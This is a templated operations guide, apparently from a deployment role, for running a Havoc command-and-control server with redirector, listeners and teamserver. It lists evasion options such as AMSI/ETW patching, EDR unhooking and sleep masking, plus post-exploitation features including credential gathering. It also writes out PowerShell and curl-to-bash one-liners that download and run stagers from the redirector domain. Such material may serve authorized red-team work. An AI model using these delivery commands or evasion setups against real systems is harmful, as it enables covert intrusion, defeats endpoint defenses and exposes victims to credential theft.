112 lines
3.8 KiB
Django/Jinja
112 lines
3.8 KiB
Django/Jinja
HAVOC C2 OPERATIONS GUIDE
|
|
==========================
|
|
|
|
This guide provides information on using the Havoc C2 framework (dev branch)
|
|
deployed on your infrastructure.
|
|
|
|
SERVER INFORMATION
|
|
-----------------
|
|
C2 Server IP: {{ c2_ip }}
|
|
Redirector Domain: {{ redirector_domain }}
|
|
Teamserver Port: {{ havoc_teamserver_port | default(40056) }}
|
|
HTTP Listener Port: {{ havoc_http_port | default(8080) }}
|
|
HTTPS Listener Port: {{ havoc_https_port | default(443) }}
|
|
Admin User: {{ havoc_admin_user | default('admin') }}
|
|
Admin Password: Stored in /root/Tools/Havoc/data/profiles/default.yaotl
|
|
|
|
CONNECTING TO THE TEAMSERVER
|
|
---------------------------
|
|
From your local machine:
|
|
|
|
1. Make sure Havoc client (dev branch) is installed:
|
|
$ git clone -b dev https://github.com/HavocFramework/Havoc.git
|
|
$ cd Havoc/Client
|
|
$ mkdir build && cd build
|
|
$ cmake -GNinja ..
|
|
$ ninja
|
|
|
|
2. Connect to the Teamserver via GUI:
|
|
- Host: {{ c2_ip }}
|
|
- Port: {{ havoc_teamserver_port | default(40056) }}
|
|
- User: {{ havoc_admin_user | default('admin') }}
|
|
- Password: See /root/Tools/Havoc/data/profiles/default.yaotl
|
|
|
|
3. CLI Connection:
|
|
$ ./havoc client --address {{ c2_ip }}:{{ havoc_teamserver_port | default(40056) }} --username {{ havoc_admin_user | default('admin') }} --password [password]
|
|
|
|
LISTENERS
|
|
--------
|
|
Two default listeners are configured:
|
|
- HTTP on port {{ havoc_http_port | default(8080) }}
|
|
- HTTPS on port {{ havoc_https_port | default(443) }} (through the redirector)
|
|
|
|
To view and manage listeners: Attack → Listeners in the Havoc client.
|
|
|
|
GENERATING PAYLOADS
|
|
-----------------
|
|
Pre-generated payloads are available in /root/Tools/Havoc/payloads/
|
|
|
|
To generate new payloads:
|
|
1. Connect to the Teamserver
|
|
2. Navigate to Attack → Payload
|
|
3. Select the listener (HTTPS recommended)
|
|
4. Choose architecture, format, and evasion options
|
|
5. For enhanced evasion: Enable indirect syscalls, stack spoofing, and sleep mask
|
|
|
|
PAYLOAD DELIVERY
|
|
--------------
|
|
PowerShell one-liner:
|
|
powershell -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('https://{{ redirector_domain }}/windows_stager.ps1')"
|
|
|
|
Linux one-liner:
|
|
curl -s https://{{ redirector_domain }}/linux_stager.sh | bash
|
|
|
|
OPERATIONAL SECURITY
|
|
------------------
|
|
- All connections are routed through the redirector
|
|
- Payload customization includes:
|
|
* Sleep time: {{ havoc_sleep | default(5) }} seconds with {{ havoc_jitter | default(30) }}% jitter
|
|
* EDR unhooking techniques
|
|
* AMSI/ETW patching
|
|
* Indirect syscalls
|
|
* Sleep masking with technique: {{ havoc_sleep_mask_technique | default(0) }}
|
|
|
|
ADVANCED FEATURES (DEV BRANCH)
|
|
----------------------------
|
|
- Enhanced memory scanner evasion
|
|
- PPID spoofing capabilities
|
|
- Reflective DLL loading improvements
|
|
- EDR hook detection and avoidance
|
|
- Process token manipulation
|
|
- Registry persistence options
|
|
|
|
POST-EXPLOITATION
|
|
---------------
|
|
For post-exploitation, Havoc offers:
|
|
|
|
1. BOF (Beacon Object Files) support
|
|
2. Integrated command & control modules
|
|
3. File system operations
|
|
4. Process injection & manipulation
|
|
5. Credential gathering capabilities
|
|
|
|
SERVER MANAGEMENT
|
|
---------------
|
|
- Havoc Teamserver service: systemctl status havoc
|
|
- Service configuration: /etc/systemd/system/havoc.service
|
|
- Configuration profiles: /root/Tools/Havoc/data/profiles/
|
|
|
|
TROUBLESHOOTING
|
|
--------------
|
|
1. Agent connection issues:
|
|
- Verify DNS for {{ redirector_domain }} points to your redirector
|
|
- Check nginx configuration on the redirector
|
|
- Confirm ports {{ havoc_http_port | default(8080) }} and {{ havoc_https_port | default(443) }} are open
|
|
|
|
2. Teamserver issues:
|
|
- Check service: systemctl status havoc
|
|
- View logs: journalctl -u havoc
|
|
- Restart if needed: systemctl restart havoc
|
|
|
|
3. Use Havoc client CLI debugging:
|
|
./havoc client --address {{ c2_ip }}:{{ havoc_teamserver_port | default(40056) }} --username {{ havoc_admin_user | default('admin') }} --password [password] --debug |